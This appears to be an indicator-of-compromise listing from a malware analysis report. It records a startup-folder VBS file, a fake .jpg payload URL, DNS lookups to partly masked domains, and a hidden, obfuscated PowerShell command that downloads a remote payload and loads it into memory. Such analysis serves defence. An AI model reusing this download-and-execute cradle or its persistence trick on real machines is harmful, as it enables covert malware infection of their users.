Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\ence.vbs
- http://www.4u##.com/uploads/file_2020-04-04_171129.jpg
- http://www.4u##.com/uploads/file_2020-04-04_171129.jpg
- DNS ASK 4u##.com
- DNS ASK mi#######sqlserver.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''http://www.4u##.com/uploads/file_2020-04-04_171129.jpg'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invok...' (with hidden window)